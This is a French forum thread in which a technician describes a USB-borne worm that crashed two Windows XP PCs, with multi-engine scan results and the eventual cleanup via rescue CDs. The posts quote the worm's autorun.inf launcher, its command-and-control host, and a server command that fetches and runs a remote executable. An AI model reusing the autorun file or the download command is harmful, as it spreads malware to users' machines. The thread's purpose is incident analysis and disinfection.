Un virus inconnu m'a planté deux PCs

[mediaforest]

Bonjour à tous,

Je viens ici continuer une discussion que j'avais démarrée ici : http://forum.zebulon.fr/ou-trouver-la-cle-...re-t165706.html

 

Donc voici mon problème : en intervenant sur le poste d'un client, je me suis rendu compte que celui-ci était infecté car le centre de sécurité windows m'affichait des messages d'erreur. J'ai rapidement découvert des fichiers exe bizarre dans le gestionnaire de tâches. Ces fichiers étaient installés à la racine du compte utilisateur dans %UserProfile% L'un des fichiers portant le nom de l'utilisateur : poste2.exe et l'autre nommé jusched.exe.

Je les ai immédiatement "killés" et supprimés du disque.

La machine était protégée par Sophos mais celui-ci a du être attaqué par le virus car il ne répondait plus, j'ai donc installé AVGfree pour scanner la machine mais il n'a rien trouvé d'autre.

Malheureusement, ma clé usb était branchée sur la machine. Je ne me suis pas trop inquiété car la clé était théoriquement protégée par flash_disinfector.

En rentrant chez moi, j'ai branché ma clé sur l'un de mes postes pour récupérer des données et je n'ai rien remarqué de spécial, cette machine était protégée par AVGFree et Winpatrol.

j'ai ensuite connecté cette clé sur mon autre poste, protégé par les mêmes outils. C'est là que j'ai eu le premier avertissement car mon soft de contrôle parental m'a signalé une tentative de connexion à un site interdit. Malheureusement le mal était fait.

J'ai bien scanné mes deux postes avec AVGFREE et clamwin mais rien n'a été détecté, alors qu'en fouillant sur mes disques j'ai à nouveau trouvé dans %UserProfile% de chacun des postes un exe portant le nom de l'utilisateur. Tandis que sur ma clé usb, j'ai trouvé aussi le fichier poste2.exe ainsi qu'un autorun.inf contenant ceci :

 
[AutoRUN]
acTioN=Ouvrir le dossier pour afficher les fichiers
sHELlexEcUte=pOStE2.EXe
iCon=SYSTEmRoOt%\SysTEm32\SheLl32.DLl,4
USEAuToPLaY=1

 

J'ai stocké tout ces exe dans un sous-dossier de ma clé usb afin d'éviter l'exécution automatique et pour pouvoir les identifier plus tard.

J'ai redémarré mes deux poste sur SystemRescueCD et je les ai scanné avec CLAMAV qui n'a rien trouvé.

Lorsque j'ai voulu re-démarrer sous windows, après l'affichage du logo Windows XP je suis tombé sur un écran bleu "PROCESS1_INITIALIZATION_FAILED" avec comme premier code d'erreur 6B et comme deuxième 0xC000007A.

J'ai bien sur tenté toutes les possibilités de démarrage possibles : dernière configuration connue, sans échec, avec ou sans réseau, la seule qui a fonctionné étant la cmdcons, mais ça ne mène pas à grand chose.

 

De retour sous SystemRescueCD j'ai fouillé dans le disque mais je n'ai rien trouvé de spécial ou du moins de visible de manière évidente.

J'ai donc posté les exe stockés sur virusscan.jotti.org et stupeur seul Dr. WEB y reconnaissait un virus : Win32.HLLW.Autoruner.7225

J'ai donc soumis mes exe à clamav, AVG, Sophos, Avast et threatexpert. seul ce dernier a fourni des informations sur l'action réelle de ce virus. Les autres l'ont quand même intégré dans leurs bases et aujourd'hui, voila ce que donne http://virusscan.jotti.org/fr/scanresult/0...a76d51fb19c3c65

[ArcaVir] 	
2009-07-22 Rien trouvé
[G DATA] 	
2009-07-23 Win32:AutoRun-AYY
[A-Squared] 	
2009-07-23 Virus.Win32.AutoRun!IK
[Ikarus] 	
2009-07-23 Virus.Win32.AutoRun
[Avast! antivirus] 	
2009-07-22 Win32:AutoRun-AYY
[Kaspersky Anti-Virus] 	
2009-07-23 Rien trouvé
[Grisoft AVG Anti-Virus] 	
2009-07-22 VB.2.J
[ESET NOD32] 	
2009-07-22 Win32/AutoRun.VB.FB worm
[Avira AntiVir] 	
2009-07-23 Rien trouvé
[Norman Virus Control] 	
2009-07-22 Rien trouvé
[Softwin BitDefender] 	
2009-07-23 Rien trouvé
[Panda Antivirus] 	
2009-07-22 Rien trouvé
[ClamAV] 	
2009-07-23 Rien trouvé
[Quick Heal] 	
2009-07-23 Rien trouvé
[CPsecure] 	
2009-07-23 Troj.Downloader.W32.Small.ivo
[Sophos] 	
2009-07-23 Troj/Drop-DB
[Dr.Web] 	
2009-07-23 Win32.HLLW.Autoruner.7225
[VirusBlokAda VBA32] 	
2009-07-22 Rien trouvé
[Frisk F-Prot Antivirus] 	
2009-07-22 Rien trouvé
[VirusBuster] 	
2009-07-22 Rien trouvé
[F-Secure Anti-Virus] 	
2009-07-23 Rien trouvé

à noter que dans ce cas Antivir ne m'aurait pas protégé plus, et qu'il ne le détecte toujours pas, il faut que je pense à le leur soumettre

 

L' analyse effectuée par threatexpert.com (http://www.threatexpert.com/report.aspx?md5=68d8db412e1bb6e24d9302654287a6b5)

révèle qu'il ouvre un port 1033 sur la machine infectée et qu'il se connecte à ns1.theimageparlour.net:8000

 

Je continue donc ma chasse au virus, j'ai donc ouvert depuis une debian pour plus de sécurité la page indiquée par threatexpert : http://ns1.theimageparlour.net:8000/

j'y trouve le texte suivant :

Code

:.dl http://cuimage.cn/dat/ iexplore.exe

 

j'ai donc ouvert cette page et elle me renvoie un fichier codec.exe à télécharger. Je l'ai testé sur virusscan.jotti.org qui me répond :

[ArcaVir]	 
2009-07-22 Rien trouvé
[G DATA]	 
2009-07-23 Rien trouvé
[A-Squared]	 
2009-07-23 Trojan.Win32.VB!IK
[Ikarus]	 
2009-07-23 Trojan.Win32.VB
[Avast! antivirus]	 
2009-07-22 Rien trouvé
[Kaspersky Anti-Virus]	 
2009-07-23 Trojan.Win32.VB.tdq
[Grisoft AVG Anti-Virus]	 
2009-07-22 Rien trouvé
[ESET NOD32]	 
2009-07-22 Win32/TrojanDownloader.VB.OBF
[Avira AntiVir]	 
2009-07-23 TR/VB.tdq.10
[Norman Virus Control]	 
2009-07-22 Rien trouvé
[Softwin BitDefender]	 
2009-07-23 Rien trouvé
[Panda Antivirus]	 
2009-07-22 Rien trouvé
[ClamAV]	 
2009-07-23 Rien trouvé
[Quick Heal]	 
2009-07-23 Trojan.VB.tdq
[CPsecure]	 
2009-07-23 Rien trouvé
[Sophos]	 
2009-07-23 Rien trouvé
[Dr.Web]	 
2009-07-23 Rien trouvé
[VirusBlokAda VBA32]	 
2009-07-22 Rien trouvé
[Frisk F-Prot Antivirus]	 
2009-07-22 Rien trouvé
[VirusBuster]	 
2009-07-22 Rien trouvé
[F-Secure Anti-Virus]	 
2009-07-23 Trojan.Win32.VB.tdq

Voila où j'en suis pour l'instant. Ce qui est étonnant c'est que les premiers exe envoyés étaient inconnus de tous ou presque et ce qui est encore plus étonnant c'est que ceux qui reconnaissent à présent le premier virus n'identifient pas forcément codec.exe comme un virus... Il faut croire qu'ils n'ont même pas pris la peine de faire la simple démarche de suivre l'activité réelle du fichier executable, comme le fait threatexpert, et qu'ils ne sont pas allés non plus étudier les urls contactées par le virus. C'est un peu décevant.

[angelique]

j'ai fait remonter ton iframe pourrite sur le site pourrite , codec.exe a été chargé .

 

voir:: http://forum.malekal.com/post164429.html#p164429

[mediaforest]

Pour le moment je n'ai pas beaucoup avancé, mais à la suite de mes remontées de virus, le support de Sophos France m'a contacté par téléphone !

Le technicien m'a conseillé d'appliquer la procédure présente sur leur site http://www.sophos.fr/support/knowledgebase...icle/52011.html

pour créer un livecd de nettoyage.

 

J'ai aussi chargé au cas ou ERD Commander ( http://www.passwordone.com/component/optio...howdown/id,183/ ) pour essayer de nettoyer la base de registre du système infecté.

 

Est-ce que quelqu'un pourrait me fournir la liste des Services de base indispensables au démarrage de Windows car je vais essayer de rétablir mon démarrage en désactivant les Services non nécessaires, on ne sait jamais...

 

Ce qui est dommage c'est que le journal de démarrage C:\windows\ntbtlog.txt n'est franchement pas assez détaillé pour pouvoir identifier le point de blocage dans le processus de démarrage... Quand on compare avec les journaux de boot d'un linux, c'est ridicule

 

J'ai l'impression que mon week-end va être chargé

[angelique]

dans ce que tu evoques , ce sont plusieurs choses distinctes , differentes infections :

 

infection via support usb avec ton pOStE2.EXe: http://forum.malekal.com/securite-maitrise...les-t16895.html

 

une autre chopée avec l'iframe pourrite qui charge codec.exe (voir message precedent)

 

aussi vu ton erreur "PROCESS1_INITIALIZATION_FAILED" avec comme premier code d'erreur 6B et comme deuxième 0xC000007A.

je pencherais pour une autre infection de type RootKit bien implanté qui aurait patché des fichiers systemes essentiels d'ou tes BSOD

 

Lire :

 

Bins de boot :: http://forum.malekal.com/impossible-demarr...ows-t19848.html

 

Live CD :: choisi plutot celui d'avira: http://www.malekal.com/tutorial_Antivir_Rescue_System.php

 

si ça peut deja t'aiguiller

[mediaforest]

Bonjour à tous,

Les choses ont avancé, j'ai déjà récupéré l'un de mes deux Pcs.

Le livecd de Sophos a bien détecté la présence de pas mal de fichiers contaminés dont %SystemRoot%\system32\uacinit.dll

 

les autres portaient un nom aléatoire, mais souvent avec une racine commune style uac54def.dll.

 

J'ai redémarré sous SystemRescueCD et j'ai déplacé les fichiers détectés vers un dossier avant de les compresser.

J'ai découvert des fichiers portant le même type de nom que ceux détectés, les ai soumis à virusscan.jotti.org qui a confirmé que d'autres antivirus les identifiaient comme infectés. Je les ai donc déplacés aussi.

Après avoir compressé le dossier de "quarantaine", et effectué un dernier chksdk /p sous cmdcons, j'ai relancé Windows et miracle, l'installation de réparation de windows à repris sont cours comme si de rien n'était, s'est terminée correctement et Windows a re-démarré dans sont état précédent, avec tous mes softs installés.